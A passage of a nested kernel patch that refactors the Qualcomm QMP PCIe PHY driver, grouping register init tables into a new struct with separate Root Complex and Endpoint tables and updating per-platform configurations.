++	QMP_PHY_INIT_CFG(QSERDES_V5_COM_PLL_IVCO, 0x0f),
++	QMP_PHY_INIT_CFG(QSERDES_V5_COM_LOCK_CMP_EN, 0x46),
++	QMP_PHY_INIT_CFG(QSERDES_V5_COM_LOCK_CMP_CFG, 0x04),
++	QMP_PHY_INIT_CFG(QSERDES_V5_COM_VCO_TUNE_MAP, 0x02),
++	QMP_PHY_INIT_CFG(QSERDES_V5_COM_HSCLK_SEL, 0x12),
++	QMP_PHY_INIT_CFG(QSERDES_V5_COM_HSCLK_HS_SWITCH_SEL, 0x00),
++	QMP_PHY_INIT_CFG(QSERDES_V5_COM_CORECLK_DIV_MODE0, 0x0a),
++	QMP_PHY_INIT_CFG(QSERDES_V5_COM_CORECLK_DIV_MODE1, 0x04),
++	QMP_PHY_INIT_CFG(QSERDES_V5_COM_CMN_MISC1, 0x88),
++	QMP_PHY_INIT_CFG(QSERDES_V5_COM_CMN_CONFIG, 0x06),
++	QMP_PHY_INIT_CFG(QSERDES_V5_COM_CMN_MODE, 0x14),
++	QMP_PHY_INIT_CFG(QSERDES_V5_COM_VCO_DC_LEVEL_CTRL, 0x0f),
++};
++
++static const struct qmp_phy_init_tbl sm8450_qmp_gen4x2_pcie_rc_serdes_tbl[] = {
+ 	QMP_PHY_INIT_CFG(QSERDES_V5_COM_SSC_PER1, 0x31),
+ 	QMP_PHY_INIT_CFG(QSERDES_V5_COM_SSC_PER2, 0x01),
+ 	QMP_PHY_INIT_CFG(QSERDES_V5_COM_SSC_STEP_SIZE1_MODE0, 0xde),
+ 	QMP_PHY_INIT_CFG(QSERDES_V5_COM_SSC_STEP_SIZE2_MODE0, 0x07),
+ 	QMP_PHY_INIT_CFG(QSERDES_V5_COM_SSC_STEP_SIZE1_MODE1, 0x97),
+ 	QMP_PHY_INIT_CFG(QSERDES_V5_COM_SSC_STEP_SIZE2_MODE1, 0x0c),
+-	QMP_PHY_INIT_CFG(QSERDES_V5_COM_BIAS_EN_CLKBUFLR_EN, 0x14),
+ 	QMP_PHY_INIT_CFG(QSERDES_V5_COM_CLK_ENABLE1, 0x90),
+-	QMP_PHY_INIT_CFG(QSERDES_V5_COM_PLL_IVCO, 0x0f),
+ 	QMP_PHY_INIT_CFG(QSERDES_V5_COM_CP_CTRL_MODE0, 0x06),
+ 	QMP_PHY_INIT_CFG(QSERDES_V5_COM_CP_CTRL_MODE1, 0x06),
+ 	QMP_PHY_INIT_CFG(QSERDES_V5_COM_PLL_RCTRL_MODE0, 0x16),
+@@ -1200,8 +1218,6 @@ static const struct qmp_phy_init_tbl sm8450_qmp_gen4x2_pcie_serdes_tbl[] = {
+ 	QMP_PHY_INIT_CFG(QSERDES_V5_COM_PLL_CCTRL_MODE0, 0x36),
+ 	QMP_PHY_INIT_CFG(QSERDES_V5_COM_PLL_CCTRL_MODE1, 0x36),
+ 	QMP_PHY_INIT_CFG(QSERDES_V5_COM_SYSCLK_EN_SEL, 0x08),
+-	QMP_PHY_INIT_CFG(QSERDES_V5_COM_LOCK_CMP_EN, 0x46),
+-	QMP_PHY_INIT_CFG(QSERDES_V5_COM_LOCK_CMP_CFG, 0x04),
+ 	QMP_PHY_INIT_CFG(QSERDES_V5_COM_LOCK_CMP1_MODE0, 0x0a),
+ 	QMP_PHY_INIT_CFG(QSERDES_V5_COM_LOCK_CMP2_MODE0, 0x1a),
+ 	QMP_PHY_INIT_CFG(QSERDES_V5_COM_LOCK_CMP1_MODE1, 0x14),
+@@ -1214,17 +1230,8 @@ static const struct qmp_phy_init_tbl sm8450_qmp_gen4x2_pcie_serdes_tbl[] = {
+ 	QMP_PHY_INIT_CFG(QSERDES_V5_COM_DIV_FRAC_START1_MODE1, 0x55),
+ 	QMP_PHY_INIT_CFG(QSERDES_V5_COM_DIV_FRAC_START2_MODE1, 0x55),
+ 	QMP_PHY_INIT_CFG(QSERDES_V5_COM_DIV_FRAC_START3_MODE1, 0x05),
+-	QMP_PHY_INIT_CFG(QSERDES_V5_COM_VCO_TUNE_MAP, 0x02),
+ 	QMP_PHY_INIT_CFG(QSERDES_V5_COM_CLK_SELECT, 0x34),
+-	QMP_PHY_INIT_CFG(QSERDES_V5_COM_HSCLK_SEL, 0x12),
+-	QMP_PHY_INIT_CFG(QSERDES_V5_COM_HSCLK_HS_SWITCH_SEL, 0x00),
+-	QMP_PHY_INIT_CFG(QSERDES_V5_COM_CORECLK_DIV_MODE0, 0x0a),
+-	QMP_PHY_INIT_CFG(QSERDES_V5_COM_CORECLK_DIV_MODE1, 0x04),
+-	QMP_PHY_INIT_CFG(QSERDES_V5_COM_CMN_MISC1, 0x88),
+ 	QMP_PHY_INIT_CFG(QSERDES_V5_COM_CORE_CLK_EN, 0x20),
+-	QMP_PHY_INIT_CFG(QSERDES_V5_COM_CMN_CONFIG, 0x06),
+-	QMP_PHY_INIT_CFG(QSERDES_V5_COM_CMN_MODE, 0x14),
+-	QMP_PHY_INIT_CFG(QSERDES_V5_COM_VCO_DC_LEVEL_CTRL, 0x0f),
+ };
+ 
+ static const struct qmp_phy_init_tbl sm8450_qmp_gen4x2_pcie_tx_tbl[] = {
+@@ -1285,46 +1292,80 @@ static const struct qmp_phy_init_tbl sm8450_qmp_gen4x2_pcie_rx_tbl[] = {
+ };
+ 
+ static const struct qmp_phy_init_tbl sm8450_qmp_gen4x2_pcie_pcs_tbl[] = {
+-	QMP_PHY_INIT_CFG(QPHY_V5_PCS_EQ_CONFIG2, 0x16),
+-	QMP_PHY_INIT_CFG(QPHY_V5_PCS_EQ_CONFIG3, 0x22),
+-	QMP_PHY_INIT_CFG(QPHY_V5_PCS_G3S2_PRE_GAIN, 0x2e),
+-	QMP_PHY_INIT_CFG(QPHY_V5_PCS_RX_SIGDET_LVL, 0x99),
++	QMP_PHY_INIT_CFG(QPHY_V5_20_PCS_EQ_CONFIG4, 0x16),
++	QMP_PHY_INIT_CFG(QPHY_V5_20_PCS_EQ_CONFIG5, 0x22),
++	QMP_PHY_INIT_CFG(QPHY_V5_20_PCS_G3S2_PRE_GAIN, 0x2e),
++	QMP_PHY_INIT_CFG(QPHY_V5_20_PCS_RX_SIGDET_LVL, 0x99),
+ };
+ 
+ static const struct qmp_phy_init_tbl sm8450_qmp_gen4x2_pcie_pcs_misc_tbl[] = {
+-	QMP_PHY_INIT_CFG(QPHY_V5_20_PCS_PCIE_ENDPOINT_REFCLK_DRIVE, 0xc1),
+-	QMP_PHY_INIT_CFG(QPHY_V5_20_PCS_PCIE_OSC_DTCT_ACTIONS, 0x00),
+ 	QMP_PHY_INIT_CFG(QPHY_V5_20_PCS_PCIE_G4_EQ_CONFIG5, 0x02),
+ 	QMP_PHY_INIT_CFG(QPHY_V5_20_PCS_PCIE_EQ_CONFIG1, 0x16),
+ 	QMP_PHY_INIT_CFG(QPHY_V5_20_PCS_PCIE_RX_MARGINING_CONFIG3, 0x28),
+ 	QMP_PHY_INIT_CFG(QPHY_V5_20_PCS_PCIE_G4_PRE_GAIN, 0x2e),
+ };
+ 
++static const struct qmp_phy_init_tbl sm8450_qmp_gen4x2_pcie_rc_pcs_misc_tbl[] = {
++	QMP_PHY_INIT_CFG(QPHY_V5_20_PCS_PCIE_ENDPOINT_REFCLK_DRIVE, 0xc1),
++	QMP_PHY_INIT_CFG(QPHY_V5_20_PCS_PCIE_OSC_DTCT_ACTIONS, 0x00),
++	QMP_PHY_INIT_CFG(QPHY_V5_20_PCS_PCIE_PRESET_P10_POST, 0x00),
++};
++
++static const struct qmp_phy_init_tbl sm8450_qmp_gen4x2_pcie_ep_serdes_tbl[] = {
++	QMP_PHY_INIT_CFG(QSERDES_V5_COM_BG_TIMER, 0x02),
++	QMP_PHY_INIT_CFG(QSERDES_V5_COM_SYS_CLK_CTRL, 0x07),
++	QMP_PHY_INIT_CFG(QSERDES_V5_COM_CP_CTRL_MODE0, 0x27),
++	QMP_PHY_INIT_CFG(QSERDES_V5_COM_CP_CTRL_MODE1, 0x0a),
++	QMP_PHY_INIT_CFG(QSERDES_V5_COM_PLL_RCTRL_MODE0, 0x17),
++	QMP_PHY_INIT_CFG(QSERDES_V5_COM_PLL_RCTRL_MODE1, 0x19),
++	QMP_PHY_INIT_CFG(QSERDES_V5_COM_PLL_CCTRL_MODE0, 0x00),
++	QMP_PHY_INIT_CFG(QSERDES_V5_COM_PLL_CCTRL_MODE1, 0x03),
++	QMP_PHY_INIT_CFG(QSERDES_V5_COM_SYSCLK_EN_SEL, 0x00),
++	QMP_PHY_INIT_CFG(QSERDES_V5_COM_LOCK_CMP1_MODE0, 0xff),
++	QMP_PHY_INIT_CFG(QSERDES_V5_COM_LOCK_CMP2_MODE0, 0x04),
++	QMP_PHY_INIT_CFG(QSERDES_V5_COM_LOCK_CMP1_MODE1, 0xff),
++	QMP_PHY_INIT_CFG(QSERDES_V5_COM_LOCK_CMP2_MODE1, 0x09),
++	QMP_PHY_INIT_CFG(QSERDES_V5_COM_DEC_START_MODE0, 0x19),
++	QMP_PHY_INIT_CFG(QSERDES_V5_COM_DEC_START_MODE1, 0x28),
++	QMP_PHY_INIT_CFG(QSERDES_V5_COM_INTEGLOOP_GAIN0_MODE0, 0xfb),
++	QMP_PHY_INIT_CFG(QSERDES_V5_COM_INTEGLOOP_GAIN1_MODE0, 0x01),
++	QMP_PHY_INIT_CFG(QSERDES_V5_COM_INTEGLOOP_GAIN0_MODE1, 0xfb),
++	QMP_PHY_INIT_CFG(QSERDES_V5_COM_INTEGLOOP_GAIN1_MODE1, 0x01),
++	QMP_PHY_INIT_CFG(QSERDES_V5_COM_CORE_CLK_EN, 0x60),
++};
++
++static const struct qmp_phy_init_tbl sm8450_qmp_gen4x2_pcie_ep_pcs_misc_tbl[] = {
++	QMP_PHY_INIT_CFG(QPHY_V5_20_PCS_PCIE_OSC_DTCT_MODE2_CONFIG5, 0x08),
++};
++
++struct qmp_phy_cfg_tables {
++	const struct qmp_phy_init_tbl *serdes;
++	int serdes_num;
++	const struct qmp_phy_init_tbl *tx;
++	int tx_num;
++	const struct qmp_phy_init_tbl *rx;
++	int rx_num;
++	const struct qmp_phy_init_tbl *pcs;
++	int pcs_num;
++	const struct qmp_phy_init_tbl *pcs_misc;
++	int pcs_misc_num;
++};
++
+ /* struct qmp_phy_cfg - per-PHY initialization config */
+ struct qmp_phy_cfg {
+ 	int lanes;
+ 
+-	/* Init sequence for PHY blocks - serdes, tx, rx, pcs */
+-	const struct qmp_phy_init_tbl *serdes_tbl;
+-	int serdes_tbl_num;
+-	const struct qmp_phy_init_tbl *serdes_tbl_sec;
+-	int serdes_tbl_num_sec;
+-	const struct qmp_phy_init_tbl *tx_tbl;
+-	int tx_tbl_num;
+-	const struct qmp_phy_init_tbl *tx_tbl_sec;
+-	int tx_tbl_num_sec;
+-	const struct qmp_phy_init_tbl *rx_tbl;
+-	int rx_tbl_num;
+-	const struct qmp_phy_init_tbl *rx_tbl_sec;
+-	int rx_tbl_num_sec;
+-	const struct qmp_phy_init_tbl *pcs_tbl;
+-	int pcs_tbl_num;
+-	const struct qmp_phy_init_tbl *pcs_tbl_sec;
+-	int pcs_tbl_num_sec;
+-	const struct qmp_phy_init_tbl *pcs_misc_tbl;
+-	int pcs_misc_tbl_num;
+-	const struct qmp_phy_init_tbl *pcs_misc_tbl_sec;
+-	int pcs_misc_tbl_num_sec;
++	/* Main init sequence for PHY blocks - serdes, tx, rx, pcs */
++	const struct qmp_phy_cfg_tables tables;
++	/*
++	 * Additional init sequences for PHY blocks, providing additional
++	 * register programming. They are used for providing separate sequences
++	 * for the Root Complex and End Point use cases.
++	 *
++	 * If EP mode is not supported, both tables can be left unset.
++	 */
++	const struct qmp_phy_cfg_tables *tables_rc;
++	const struct qmp_phy_cfg_tables *tables_ep;
+ 
+ 	/* clock ids to be requested */
+ 	const char * const *clk_list;
+@@ -1344,11 +1385,7 @@ struct qmp_phy_cfg {
+ 	/* bit offset of PHYSTATUS in QPHY_PCS_STATUS register */
+ 	unsigned int phy_status;
+ 
+-	/* true, if PHY needs delay after POWER_DOWN */
+-	bool has_pwrdn_delay;
+-	/* power_down delay in usec */
+-	int pwrdn_delay_min;
+-	int pwrdn_delay_max;
++	bool skip_start_delay;
+ 
+ 	/* QMP PHY pipe clock interface rate */
+ 	unsigned long pipe_clock_rate;
+@@ -1368,6 +1405,7 @@ struct qmp_phy_cfg {
+  * @pcs_misc: iomapped memory space for lane's pcs_misc
+  * @pipe_clk: pipe clock
+  * @qmp: QMP phy to which this lane belongs
++ * @mode: currently selected PHY mode
+  */
+ struct qmp_phy {
+ 	struct phy *phy;
+@@ -1381,6 +1419,7 @@ struct qmp_phy {
+ 	void __iomem *pcs_misc;
+ 	struct clk *pipe_clk;
+ 	struct qcom_qmp *qmp;
++	int mode;
+ };
+ 
+ /**
+@@ -1459,14 +1498,16 @@ static const char * const sdm845_pciephy_reset_l[] = {
+ static const struct qmp_phy_cfg ipq8074_pciephy_cfg = {
+ 	.lanes			= 1,
+ 
+-	.serdes_tbl		= ipq8074_pcie_serdes_tbl,
+-	.serdes_tbl_num		= ARRAY_SIZE(ipq8074_pcie_serdes_tbl),
+-	.tx_tbl			= ipq8074_pcie_tx_tbl,
+-	.tx_tbl_num		= ARRAY_SIZE(ipq8074_pcie_tx_tbl),
+-	.rx_tbl			= ipq8074_pcie_rx_tbl,
+-	.rx_tbl_num		= ARRAY_SIZE(ipq8074_pcie_rx_tbl),
+-	.pcs_tbl		= ipq8074_pcie_pcs_tbl,
+-	.pcs_tbl_num		= ARRAY_SIZE(ipq8074_pcie_pcs_tbl),
++	.tables = {
++		.serdes		= ipq8074_pcie_serdes_tbl,
++		.serdes_num	= ARRAY_SIZE(ipq8074_pcie_serdes_tbl),
++		.tx		= ipq8074_pcie_tx_tbl,
++		.tx_num		= ARRAY_SIZE(ipq8074_pcie_tx_tbl),
++		.rx		= ipq8074_pcie_rx_tbl,
++		.rx_num		= ARRAY_SIZE(ipq8074_pcie_rx_tbl),
++		.pcs		= ipq8074_pcie_pcs_tbl,
++		.pcs_num	= ARRAY_SIZE(ipq8074_pcie_pcs_tbl),
++	},
+ 	.clk_list		= ipq8074_pciephy_clk_l,
+ 	.num_clks		= ARRAY_SIZE(ipq8074_pciephy_clk_l),
+ 	.reset_list		= ipq8074_pciephy_reset_l,
+@@ -1478,23 +1519,23 @@ static const struct qmp_phy_cfg ipq8074_pciephy_cfg = {
+ 	.start_ctrl		= SERDES_START | PCS_START,
+ 	.pwrdn_ctrl		= SW_PWRDN | REFCLK_DRV_DSBL,
+ 	.phy_status		= PHYSTATUS,
+-
+-	.has_pwrdn_delay	= true,
+-	.pwrdn_delay_min	= 995,		/* us */
+-	.pwrdn_delay_max	= 1005,		/* us */
+ };
+ 
+ static const struct qmp_phy_cfg ipq8074_pciephy_gen3_cfg = {
+ 	.lanes			= 1,
+ 
+-	.serdes_tbl		= ipq8074_pcie_gen3_serdes_tbl,
+-	.serdes_tbl_num		= ARRAY_SIZE(ipq8074_pcie_gen3_serdes_tbl),
+-	.tx_tbl			= ipq8074_pcie_gen3_tx_tbl,
+-	.tx_tbl_num		= ARRAY_SIZE(ipq8074_pcie_gen3_tx_tbl),
+-	.rx_tbl			= ipq8074_pcie_gen3_rx_tbl,
+-	.rx_tbl_num		= ARRAY_SIZE(ipq8074_pcie_gen3_rx_tbl),
+-	.pcs_tbl		= ipq8074_pcie_gen3_pcs_tbl,
+-	.pcs_tbl_num		= ARRAY_SIZE(ipq8074_pcie_gen3_pcs_tbl),
++	.tables = {
++		.serdes		= ipq8074_pcie_gen3_serdes_tbl,
++		.serdes_num	= ARRAY_SIZE(ipq8074_pcie_gen3_serdes_tbl),
++		.tx		= ipq8074_pcie_gen3_tx_tbl,
++		.tx_num		= ARRAY_SIZE(ipq8074_pcie_gen3_tx_tbl),
++		.rx		= ipq8074_pcie_gen3_rx_tbl,
++		.rx_num		= ARRAY_SIZE(ipq8074_pcie_gen3_rx_tbl),
++		.pcs		= ipq8074_pcie_gen3_pcs_tbl,
++		.pcs_num	= ARRAY_SIZE(ipq8074_pcie_gen3_pcs_tbl),
++		.pcs_misc	= ipq8074_pcie_gen3_pcs_misc_tbl,
++		.pcs_misc_num	= ARRAY_SIZE(ipq8074_pcie_gen3_pcs_misc_tbl),
++	},
+ 	.clk_list		= ipq8074_pciephy_clk_l,
+ 	.num_clks		= ARRAY_SIZE(ipq8074_pciephy_clk_l),
+ 	.reset_list		= ipq8074_pciephy_reset_l,
+@@ -1505,10 +1546,7 @@ static const struct qmp_phy_cfg ipq8074_pciephy_gen3_cfg = {
+ 
+ 	.start_ctrl		= SERDES_START | PCS_START,
+ 	.pwrdn_ctrl		= SW_PWRDN | REFCLK_DRV_DSBL,
+-
+-	.has_pwrdn_delay	= true,
+-	.pwrdn_delay_min	= 995,		/* us */
+-	.pwrdn_delay_max	= 1005,		/* us */
++	.phy_status		= PHYSTATUS,
+ 
+ 	.pipe_clock_rate	= 250000000,
+ };
+@@ -1516,16 +1554,18 @@ static const struct qmp_phy_cfg ipq8074_pciephy_gen3_cfg = {
+ static const struct qmp_phy_cfg ipq6018_pciephy_cfg = {
+ 	.lanes			= 1,
+ 
+-	.serdes_tbl		= ipq6018_pcie_serdes_tbl,
+-	.serdes_tbl_num		= ARRAY_SIZE(ipq6018_pcie_serdes_tbl),
+-	.tx_tbl			= ipq6018_pcie_tx_tbl,
+-	.tx_tbl_num		= ARRAY_SIZE(ipq6018_pcie_tx_tbl),
+-	.rx_tbl			= ipq6018_pcie_rx_tbl,
+-	.rx_tbl_num		= ARRAY_SIZE(ipq6018_pcie_rx_tbl),
+-	.pcs_tbl		= ipq6018_pcie_pcs_tbl,
+-	.pcs_tbl_num		= ARRAY_SIZE(ipq6018_pcie_pcs_tbl),
+-	.pcs_misc_tbl		= ipq6018_pcie_pcs_misc_tbl,
+-	.pcs_misc_tbl_num	= ARRAY_SIZE(ipq6018_pcie_pcs_misc_tbl),
++	.tables = {
++		.serdes		= ipq6018_pcie_serdes_tbl,
++		.serdes_num	= ARRAY_SIZE(ipq6018_pcie_serdes_tbl),
++		.tx		= ipq6018_pcie_tx_tbl,
++		.tx_num		= ARRAY_SIZE(ipq6018_pcie_tx_tbl),
++		.rx		= ipq6018_pcie_rx_tbl,
++		.rx_num		= ARRAY_SIZE(ipq6018_pcie_rx_tbl),
++		.pcs		= ipq6018_pcie_pcs_tbl,
++		.pcs_num	= ARRAY_SIZE(ipq6018_pcie_pcs_tbl),
++		.pcs_misc	= ipq6018_pcie_pcs_misc_tbl,
++		.pcs_misc_num	= ARRAY_SIZE(ipq6018_pcie_pcs_misc_tbl),
++	},
+ 	.clk_list		= ipq8074_pciephy_clk_l,
+ 	.num_clks		= ARRAY_SIZE(ipq8074_pciephy_clk_l),
+ 	.reset_list		= ipq8074_pciephy_reset_l,
+@@ -1536,25 +1576,24 @@ static const struct qmp_phy_cfg ipq6018_pciephy_cfg = {
+ 
+ 	.start_ctrl		= SERDES_START | PCS_START,
+ 	.pwrdn_ctrl		= SW_PWRDN | REFCLK_DRV_DSBL,
+-
+-	.has_pwrdn_delay	= true,
+-	.pwrdn_delay_min	= 995,		/* us */
+-	.pwrdn_delay_max	= 1005,		/* us */
++	.phy_status		= PHYSTATUS,
+ };
+ 
+ static const struct qmp_phy_cfg sdm845_qmp_pciephy_cfg = {
+ 	.lanes			= 1,
+ 
+-	.serdes_tbl		= sdm845_qmp_pcie_serdes_tbl,
+-	.serdes_tbl_num		= ARRAY_SIZE(sdm845_qmp_pcie_serdes_tbl),
+-	.tx_tbl			= sdm845_qmp_pcie_tx_tbl,
+-	.tx_tbl_num		= ARRAY_SIZE(sdm845_qmp_pcie_tx_tbl),
+-	.rx_tbl			= sdm845_qmp_pcie_rx_tbl,
+-	.rx_tbl_num		= ARRAY_SIZE(sdm845_qmp_pcie_rx_tbl),
+-	.pcs_tbl		= sdm845_qmp_pcie_pcs_tbl,
+-	.pcs_tbl_num		= ARRAY_SIZE(sdm845_qmp_pcie_pcs_tbl),
+-	.pcs_misc_tbl		= sdm845_qmp_pcie_pcs_misc_tbl,
+-	.pcs_misc_tbl_num	= ARRAY_SIZE(sdm845_qmp_pcie_pcs_misc_tbl),
++	.tables = {
++		.serdes		= sdm845_qmp_pcie_serdes_tbl,
++		.serdes_num	= ARRAY_SIZE(sdm845_qmp_pcie_serdes_tbl),
++		.tx		= sdm845_qmp_pcie_tx_tbl,
++		.tx_num		= ARRAY_SIZE(sdm845_qmp_pcie_tx_tbl),
++		.rx		= sdm845_qmp_pcie_rx_tbl,
++		.rx_num		= ARRAY_SIZE(sdm845_qmp_pcie_rx_tbl),
++		.pcs		= sdm845_qmp_pcie_pcs_tbl,
++		.pcs_num	= ARRAY_SIZE(sdm845_qmp_pcie_pcs_tbl),
++		.pcs_misc	= sdm845_qmp_pcie_pcs_misc_tbl,
++		.pcs_misc_num	= ARRAY_SIZE(sdm845_qmp_pcie_pcs_misc_tbl),
++	},
+ 	.clk_list		= sdm845_pciephy_clk_l,
+ 	.num_clks		= ARRAY_SIZE(sdm845_pciephy_clk_l),
+ 	.reset_list		= sdm845_pciephy_reset_l,
+@@ -1566,23 +1605,21 @@ static const struct qmp_phy_cfg sdm845_qmp_pciephy_cfg = {
+ 	.start_ctrl		= PCS_START | SERDES_START,
+ 	.pwrdn_ctrl		= SW_PWRDN | REFCLK_DRV_DSBL,
+ 	.phy_status		= PHYSTATUS,
+-
+-	.has_pwrdn_delay	= true,
+-	.pwrdn_delay_min	= 995,		/* us */
+-	.pwrdn_delay_max	= 1005,		/* us */
+ };
+ 
+ static const struct qmp_phy_cfg sdm845_qhp_pciephy_cfg = {
+ 	.lanes			= 1,
+ 
+-	.serdes_tbl		= sdm845_qhp_pcie_serdes_tbl,
+-	.serdes_tbl_num		= ARRAY_SIZE(sdm845_qhp_pcie_serdes_tbl),
+-	.tx_tbl			= sdm845_qhp_pcie_tx_tbl,
+-	.tx_tbl_num		= ARRAY_SIZE(sdm845_qhp_pcie_tx_tbl),
+-	.rx_tbl			= sdm845_qhp_pcie_rx_tbl,
+-	.rx_tbl_num		= ARRAY_SIZE(sdm845_qhp_pcie_rx_tbl),
+-	.pcs_tbl		= sdm845_qhp_pcie_pcs_tbl,
+-	.pcs_tbl_num		= ARRAY_SIZE(sdm845_qhp_pcie_pcs_tbl),
++	.tables = {
++		.serdes		= sdm845_qhp_pcie_serdes_tbl,
++		.serdes_num	= ARRAY_SIZE(sdm845_qhp_pcie_serdes_tbl),
++		.tx		= sdm845_qhp_pcie_tx_tbl,
++		.tx_num		= ARRAY_SIZE(sdm845_qhp_pcie_tx_tbl),
++		.rx		= sdm845_qhp_pcie_rx_tbl,
++		.rx_num		= ARRAY_SIZE(sdm845_qhp_pcie_rx_tbl),
++		.pcs		= sdm845_qhp_pcie_pcs_tbl,
++		.pcs_num	= ARRAY_SIZE(sdm845_qhp_pcie_pcs_tbl),
++	},
+ 	.clk_list		= sdm845_pciephy_clk_l,
+ 	.num_clks		= ARRAY_SIZE(sdm845_pciephy_clk_l),
+ 	.reset_list		= sdm845_pciephy_reset_l,
+@@ -1594,33 +1631,33 @@ static const struct qmp_phy_cfg sdm845_qhp_pciephy_cfg = {
+ 	.start_ctrl		= PCS_START | SERDES_START,
+ 	.pwrdn_ctrl		= SW_PWRDN | REFCLK_DRV_DSBL,
+ 	.phy_status		= PHYSTATUS,
+-
+-	.has_pwrdn_delay	= true,
+-	.pwrdn_delay_min	= 995,		/* us */
+-	.pwrdn_delay_max	= 1005,		/* us */
+ };
+ 
+ static const struct qmp_phy_cfg sm8250_qmp_gen3x1_pciephy_cfg = {
+ 	.lanes			= 1,
+ 
+-	.serdes_tbl		= sm8250_qmp_pcie_serdes_tbl,
+-	.serdes_tbl_num		= ARRAY_SIZE(sm8250_qmp_pcie_serdes_tbl),
+-	.serdes_tbl_sec		= sm8250_qmp_gen3x1_pcie_serdes_tbl,
+-	.serdes_tbl_num_sec	= ARRAY_SIZE(sm8250_qmp_gen3x1_pcie_serdes_tbl),
+-	.tx_tbl			= sm8250_qmp_pcie_tx_tbl,
+-	.tx_tbl_num		= ARRAY_SIZE(sm8250_qmp_pcie_tx_tbl),
+-	.rx_tbl			= sm8250_qmp_pcie_rx_tbl,
+-	.rx_tbl_num		= ARRAY_SIZE(sm8250_qmp_pcie_rx_tbl),
+-	.rx_tbl_sec		= sm8250_qmp_gen3x1_pcie_rx_tbl,
+-	.rx_tbl_num_sec		= ARRAY_SIZE(sm8250_qmp_gen3x1_pcie_rx_tbl),
+-	.pcs_tbl		= sm8250_qmp_pcie_pcs_tbl,
+-	.pcs_tbl_num		= ARRAY_SIZE(sm8250_qmp_pcie_pcs_tbl),
+-	.pcs_tbl_sec		= sm8250_qmp_gen3x1_pcie_pcs_tbl,
+-	.pcs_tbl_num_sec		= ARRAY_SIZE(sm8250_qmp_gen3x1_pcie_pcs_tbl),
+-	.pcs_misc_tbl		= sm8250_qmp_pcie_pcs_misc_tbl,
+-	.pcs_misc_tbl_num	= ARRAY_SIZE(sm8250_qmp_pcie_pcs_misc_tbl),
+-	.pcs_misc_tbl_sec		= sm8250_qmp_gen3x1_pcie_pcs_misc_tbl,
+-	.pcs_misc_tbl_num_sec	= ARRAY_SIZE(sm8250_qmp_gen3x1_pcie_pcs_misc_tbl),
++	.tables = {
++		.serdes		= sm8250_qmp_pcie_serdes_tbl,
++		.serdes_num	= ARRAY_SIZE(sm8250_qmp_pcie_serdes_tbl),
++		.tx		= sm8250_qmp_pcie_tx_tbl,
++		.tx_num		= ARRAY_SIZE(sm8250_qmp_pcie_tx_tbl),
++		.rx		= sm8250_qmp_pcie_rx_tbl,
++		.rx_num		= ARRAY_SIZE(sm8250_qmp_pcie_rx_tbl),
++		.pcs		= sm8250_qmp_pcie_pcs_tbl,
++		.pcs_num	= ARRAY_SIZE(sm8250_qmp_pcie_pcs_tbl),
++		.pcs_misc	= sm8250_qmp_pcie_pcs_misc_tbl,
++		.pcs_misc_num	= ARRAY_SIZE(sm8250_qmp_pcie_pcs_misc_tbl),
++	},
++	.tables_rc = &(const struct qmp_phy_cfg_tables) {
++		.serdes		= sm8250_qmp_gen3x1_pcie_serdes_tbl,
++		.serdes_num	= ARRAY_SIZE(sm8250_qmp_gen3x1_pcie_serdes_tbl),
++		.rx		= sm8250_qmp_gen3x1_pcie_rx_tbl,
++		.rx_num		= ARRAY_SIZE(sm8250_qmp_gen3x1_pcie_rx_tbl),
++		.pcs		= sm8250_qmp_gen3x1_pcie_pcs_tbl,
++		.pcs_num	= ARRAY_SIZE(sm8250_qmp_gen3x1_pcie_pcs_tbl),
++		.pcs_misc	= sm8250_qmp_gen3x1_pcie_pcs_misc_tbl,
++		.pcs_misc_num	= ARRAY_SIZE(sm8250_qmp_gen3x1_pcie_pcs_misc_tbl),
++	},
+ 	.clk_list		= sdm845_pciephy_clk_l,
+ 	.num_clks		= ARRAY_SIZE(sdm845_pciephy_clk_l),
+ 	.reset_list		= sdm845_pciephy_reset_l,
+@@ -1632,33 +1669,33 @@ static const struct qmp_phy_cfg sm8250_qmp_gen3x1_pciephy_cfg = {
+ 	.start_ctrl		= PCS_START | SERDES_START,
+ 	.pwrdn_ctrl		= SW_PWRDN | REFCLK_DRV_DSBL,
+ 	.phy_status		= PHYSTATUS,
+-
+-	.has_pwrdn_delay	= true,
+-	.pwrdn_delay_min	= 995,		/* us */
+-	.pwrdn_delay_max	= 1005,		/* us */
+ };
+ 
+ static const struct qmp_phy_cfg sm8250_qmp_gen3x2_pciephy_cfg = {
+ 	.lanes			= 2,
+ 
+-	.serdes_tbl		= sm8250_qmp_pcie_serdes_tbl,
+-	.serdes_tbl_num		= ARRAY_SIZE(sm8250_qmp_pcie_serdes_tbl),
+-	.tx_tbl			= sm8250_qmp_pcie_tx_tbl,
+-	.tx_tbl_num		= ARRAY_SIZE(sm8250_qmp_pcie_tx_tbl),
+-	.tx_tbl_sec		= sm8250_qmp_gen3x2_pcie_tx_tbl,
+-	.tx_tbl_num_sec		= ARRAY_SIZE(sm8250_qmp_gen3x2_pcie_tx_tbl),
+-	.rx_tbl			= sm8250_qmp_pcie_rx_tbl,
+-	.rx_tbl_num		= ARRAY_SIZE(sm8250_qmp_pcie_rx_tbl),
+-	.rx_tbl_sec		= sm8250_qmp_gen3x2_pcie_rx_tbl,
+-	.rx_tbl_num_sec		= ARRAY_SIZE(sm8250_qmp_gen3x2_pcie_rx_tbl),
+-	.pcs_tbl		= sm8250_qmp_pcie_pcs_tbl,
+-	.pcs_tbl_num		= ARRAY_SIZE(sm8250_qmp_pcie_pcs_tbl),
+-	.pcs_tbl_sec		= sm8250_qmp_gen3x2_pcie_pcs_tbl,
+-	.pcs_tbl_num_sec		= ARRAY_SIZE(sm8250_qmp_gen3x2_pcie_pcs_tbl),
+-	.pcs_misc_tbl		= sm8250_qmp_pcie_pcs_misc_tbl,
+-	.pcs_misc_tbl_num	= ARRAY_SIZE(sm8250_qmp_pcie_pcs_misc_tbl),
+-	.pcs_misc_tbl_sec		= sm8250_qmp_gen3x2_pcie_pcs_misc_tbl,
+-	.pcs_misc_tbl_num_sec	= ARRAY_SIZE(sm8250_qmp_gen3x2_pcie_pcs_misc_tbl),
++	.tables = {
++		.serdes		= sm8250_qmp_pcie_serdes_tbl,
++		.serdes_num	= ARRAY_SIZE(sm8250_qmp_pcie_serdes_tbl),
++		.tx		= sm8250_qmp_pcie_tx_tbl,
++		.tx_num		= ARRAY_SIZE(sm8250_qmp_pcie_tx_tbl),
++		.rx		= sm8250_qmp_pcie_rx_tbl,
++		.rx_num		= ARRAY_SIZE(sm8250_qmp_pcie_rx_tbl),
++		.pcs		= sm8250_qmp_pcie_pcs_tbl,
